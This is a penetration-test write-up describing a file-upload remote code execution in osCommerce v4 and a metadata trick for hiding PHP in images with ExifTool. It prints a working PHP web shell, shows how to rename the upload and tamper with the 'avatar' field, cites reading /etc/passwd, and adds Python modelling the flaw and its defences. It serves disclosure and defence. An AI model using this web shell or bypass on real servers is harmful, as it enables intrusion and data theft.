
In a recent penetration test I identified a critical vulnerability in osCommerce v4: Remote Code Execution (RCE), reached by bypassing the restrictions on file uploads.
The issue was discovered while editing the administrator's profile picture. By changing the uploaded file's extension from 'shell.gif' to 'shell.php' in the intercepted request described below, I found that the application accepted the file under the altered name, and because the web server hands .php files to the PHP interpreter, the uploaded content was executed.

I started by uploading a malicious GIF file through the 'edit' option on the profile picture.

The request was intercepted with Burp Suite, as illustrated in the image below. In the intercepted request I changed the filename from 'shell.gif' to 'shell.php'. The file's content was the following payload:

GIF89a;
<?php
system($_GET['cmd']);
?>

This is a minimal PHP web shell: it runs whatever the 'cmd' GET parameter contains through system() and returns the output. The leading 'GIF89a;' is the GIF file signature, so any check that only inspects the first bytes of the upload (a MIME sniff based on magic numbers, or PHP's getimagesize()) classifies the file as an image. The PHP interpreter, which is selected by the .php extension rather than by the content, simply echoes the bytes outside the '<?php ... ?>' tags and executes what is inside them. Note that a bare '<?' open tag only works when short_open_tag is enabled in php.ini; '<?php' is interpreted regardless of that setting. This is the classic pattern for bypassing upload filters that validate content but trust the client-supplied filename.

After the upload the image appeared to load, but the stored filename was still 'shell.gif'.

However, after clicking 'Update' and intercepting that second request, I found an 'avatar' parameter carrying the filename 'shell.gif'. Changing it to 'shell.php' made the application store the file under that name: the server trusted the client-supplied value instead of the name it had recorded itself.


By requesting 'shell.php' from its upload directory with the command in the 'cmd' parameter, I was able to achieve Remote Code Execution (RCE). As an example, executing 'cat /etc/passwd' demonstrated the ability to run commands on the server and potentially access sensitive data.
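As an added illustration (not osCommerce code and not a capture from the test above), the following Python models the server-side handling the write-up describes next to a hardened version of the same handler. Function and field names are hypothetical; the upload body is the write-up's payload, constructed inline.

```python
import re
import secrets

# Constructed sample upload body: the write-up's payload (GIF signature followed by PHP).
SAMPLE_PAYLOAD = b"GIF89a;\n<?php system($_GET['cmd']); ?>\n"
# Constructed minimal GIF with no payload, used as the benign case.
CLEAN_GIF = b"GIF89a" + b"\x01\x00\x01\x00\x00\x00\x00" + b"\x3B"

ALLOWED_EXT = {"gif", "jpg", "jpeg", "png"}
IMAGE_MAGIC = {
    b"GIF87a": "gif",
    b"GIF89a": "gif",
    b"\xff\xd8\xff": "jpg",
    b"\x89PNG\r\n\x1a\n": "png",
}
# Any PHP open tag: "<?php", "<?=" or the short "<?".
PHP_TAG = re.compile(rb"<\?(php|=)?")


def sniff_image_type(data):
    """Return the image type implied by the leading bytes, or None."""
    for magic, ext in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return ext
    return None


def client_ext(filename):
    """Extension as the client supplied it, lower-cased ('' if none)."""
    return filename.rsplit(".", 1)[-1].lower() if "." in filename else ""


def vulnerable_save(filename, data, avatar_param=None):
    """Model of the behaviour the write-up describes (a hypothetical reconstruction,
    not osCommerce source). The content only has to *start* like an image, the
    client-supplied filename is kept, and the 'avatar' field of the later 'Update'
    request overrides the stored name. Returns (accepted, stored_name_or_reason)."""
    if sniff_image_type(data) is None:
        return (False, "rejected: not an image")
    stored = avatar_param if avatar_param else filename
    return (True, stored)  # a .php name here is executed by the web server


def hardened_save(filename, data, avatar_param=None):
    """Hardened handler. The extension must be on the allow-list and agree with the
    sniffed content type; the stored name is random and chosen by the server; the
    'avatar' field is ignored (the server keeps its own record of the name); and
    files containing a PHP open tag anywhere are refused outright."""
    kind = sniff_image_type(data)
    if kind is None:
        return (False, "rejected: not an image")
    ext = client_ext(filename)
    if ext == "jpeg":
        ext = "jpg"
    if ext not in ALLOWED_EXT or ext != kind:
        return (False, "rejected: extension %r does not match content %r" % (ext, kind))
    if PHP_TAG.search(data):
        return (False, "rejected: PHP open tag inside image data")
    stored = "%s.%s" % (secrets.token_hex(16), kind)  # avatar_param deliberately unused
    return (True, stored)


if __name__ == "__main__":
    print("vulnerable, renamed upload :", vulnerable_save("shell.php", SAMPLE_PAYLOAD))
    print("vulnerable, avatar tamper  :", vulnerable_save("shell.gif", SAMPLE_PAYLOAD, "shell.php"))
    print("hardened, renamed upload   :", hardened_save("shell.php", SAMPLE_PAYLOAD))
    print("hardened, avatar tamper    :", hardened_save("shell.gif", SAMPLE_PAYLOAD, "shell.php"))
    print("hardened, clean gif        :", hardened_save("avatar.gif", CLEAN_GIF, "shell.php"))
```

The random server-chosen name removes both bypasses at once: neither the upload filename nor the 'avatar' field can end in .php. As defence in depth, the upload directory should also have PHP execution switched off (for Apache with mod_php, `php_admin_flag engine off` in that directory's configuration), so that even a file that slips through is served as static content rather than run.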

I'm going to share a neat trick for achieving Remote Code Execution (RCE) via image metadata using ExifTool. It's a small method that can yield powerful results.
Imagine you have an image file and you want to embed PHP code in its metadata with ExifTool. Let's say you write the following into the Comment tag: <?php echo system('id'); ?>.
When executed, this prints the output of the id command, which shows the user and group the web server process runs as, and therefore the privileges you have gained.

With the PHP code sitting in the metadata, the file is still a structurally valid image: signature checks, getimagesize() and similar content inspection all pass, because the payload lives in a comment block that image decoders skip. That is what the trick buys you. It does not, by itself, make the server run anything: the code executes only if the uploaded file is handed to the PHP interpreter, for example because the extension was changed to .php as in the osCommerce case above, or because a local file inclusion bug includes the file. An application that strips or re-encodes metadata on upload, and stores uploads where PHP execution is disabled, defeats it.



Now, let's say we intercept the request with a tool like Burp Suite and then fetch the uploaded file. If the PHP code ran, the output of the id command appears in the response, spliced in among the image bytes where the comment was, confirming that we've achieved Remote Code Execution.
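As an added example, not part of the original write-up and not ExifTool's own code, the following Python builds the kind of GIF that `exiftool -Comment='<?php echo system("id"); ?>' avatar.gif` produces, walks its block structure the way an image validator does (without ever looking inside the comment), pulls out the PHP that an upload scanner should flag, and strips the comment the way a hardened upload handler should. Function names are my own; the byte layout follows the GIF89a specification, and the payload is constructed inline.

```python
import re
import struct

# The write-up's payload, constructed here; ExifTool's -Comment option writes the same block.
PAYLOAD = b"<?php echo system('id'); ?>"
# Matches "<?php ... ?>", "<?= ... ?>" and short "<? ... ?>" blocks anywhere in a byte string.
PHP_BLOCK = re.compile(rb"<\?(?:php\b|=)?(.*?)\?>", re.S)

def _sub_blocks(payload):
    """Encode bytes as GIF data sub-blocks: <len><data> repeated, ending in a zero-length block."""
    out = bytearray()
    for i in range(0, len(payload), 255):
        chunk = payload[i:i + 255]
        out.append(len(chunk))
        out += chunk
    out.append(0)
    return bytes(out)

def _read_sub_blocks(data, pos):
    """Decode sub-blocks starting at pos; return (payload, position after the terminator)."""
    out = bytearray()
    while True:
        n = data[pos]
        pos += 1
        if n == 0:
            return bytes(out), pos
        out += data[pos:pos + n]
        pos += n

def build_gif_with_comment(comment):
    """Return a valid 1x1 GIF89a carrying `comment` in a Comment Extension (0x21 0xFE)."""
    header = b"GIF89a"
    lsd = struct.pack("<HHBBB", 1, 1, 0x80, 0, 0)   # 1x1, global colour table with 2 entries
    gct = b"\x00\x00\x00\xff\xff\xff"               # black, white
    comment_ext = b"\x21\xFE" + _sub_blocks(comment)
    image_desc = b"\x2C" + struct.pack("<HHHHB", 0, 0, 1, 1, 0)
    image_data = b"\x02" + b"\x02\x44\x01\x00"       # LZW min code size 2; codes: clear, 0, EOI
    return header + lsd + gct + comment_ext + image_desc + image_data + b"\x3B"

def _header_len(data):
    """Length of signature + Logical Screen Descriptor + optional Global Colour Table."""
    if data[:6] not in (b"GIF87a", b"GIF89a"):
        raise ValueError("not a GIF")
    packed = data[10]
    n = 13
    if packed & 0x80:
        n += 3 * (2 << (packed & 0x07))
    return n

def iter_gif_blocks(data):
    """Walk the block stream after the header, yielding (tag, label, start, end).
    tag is 0x21 (extension, with its label byte), 0x2C (image, label None) or 0x3B (trailer).
    A decoder validating structure does exactly this and never interprets a comment."""
    pos = _header_len(data)
    while pos < len(data):
        start = pos
        tag = data[pos]
        pos += 1
        if tag == 0x3B:
            yield (tag, None, start, pos)
            return
        if tag == 0x21:
            label = data[pos]
            pos += 1
            _, pos = _read_sub_blocks(data, pos)
            yield (tag, label, start, pos)
        elif tag == 0x2C:
            img_packed = data[pos + 8]
            pos += 9                                   # image descriptor
            if img_packed & 0x80:
                pos += 3 * (2 << (img_packed & 0x07))  # local colour table
            pos += 1                                   # LZW minimum code size
            _, pos = _read_sub_blocks(data, pos)
            yield (tag, None, start, pos)
        else:
            raise ValueError("unexpected block 0x%02x at offset %d" % (tag, start))

def gif_comments(data):
    """Every Comment Extension payload in the file, in order."""
    return [_read_sub_blocks(data, start + 2)[0]
            for tag, label, start, _ in iter_gif_blocks(data)
            if tag == 0x21 and label == 0xFE]

def extract_php_blocks(data):
    """What an upload scanner should flag: the code PHP would execute if it parsed this file."""
    return [m.group(1).strip().decode("latin-1") for m in PHP_BLOCK.finditer(data)]

def strip_gif_comments(data):
    """Hardened handling: rebuild the file without Comment Extensions (re-encoding does the same)."""
    out = bytearray(data[:_header_len(data)])
    for tag, label, start, end in iter_gif_blocks(data):
        if not (tag == 0x21 and label == 0xFE):
            out += data[start:end]
    return bytes(out)

if __name__ == "__main__":
    gif = build_gif_with_comment(PAYLOAD)
    print("blocks seen by a validator:", [hex(t) for t, *_ in iter_gif_blocks(gif)])
    print("comments:", gif_comments(gif))
    print("embedded PHP:", extract_php_blocks(gif))
    print("after stripping:", extract_php_blocks(strip_gif_comments(gif)))
```

The structural walk succeeds on both the poisoned and the stripped file, which is exactly why a decoder-based check alone is not a defence; the scanner and the comment stripper are the two controls that actually remove the payload.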

So, there you have it — a sneaky little trick to achieve RCE via metadata using ExifTool. Happy hacking!